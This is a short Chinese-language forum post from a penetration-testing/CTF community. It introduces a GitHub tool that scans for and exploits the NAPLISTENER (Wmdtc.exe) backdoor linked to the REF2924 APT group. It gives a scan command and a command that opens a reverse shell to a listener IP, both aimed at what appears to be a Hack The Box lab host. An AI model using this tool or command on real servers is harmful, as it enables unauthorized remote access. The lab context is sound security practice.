NAPLISTENER>APT-REF2924组织后门扫描利用工具-渗透测试论坛-CTF-讯岚社区

NAPLISTENER>APT-REF2924组织后门扫描利用工具

项目地址:https://github.com/MartinxMax/NAPLISTENER

简介

这是与REF2924 APT组关联的Wmdtc.exe后门扫描程序。
我们可以在Windows和Linux上使用此工具来扫描目标服务器。
如果发现字段[Microsoft HTTPAPI/2.0]存在,您可以尝试扫描组织的后门。
当第一次运行脚本时,它将自动帮助你下载相关文件

扫描

$ python3 Naplistener.py -u "https://napper.htb"

image.png

反向Shell

$ python3 Naplistener.py -u "https://napper.htb" -lh 10.10.16.15 -lp 10032

image.png

image.png

请登录后发表评论

    没有回复内容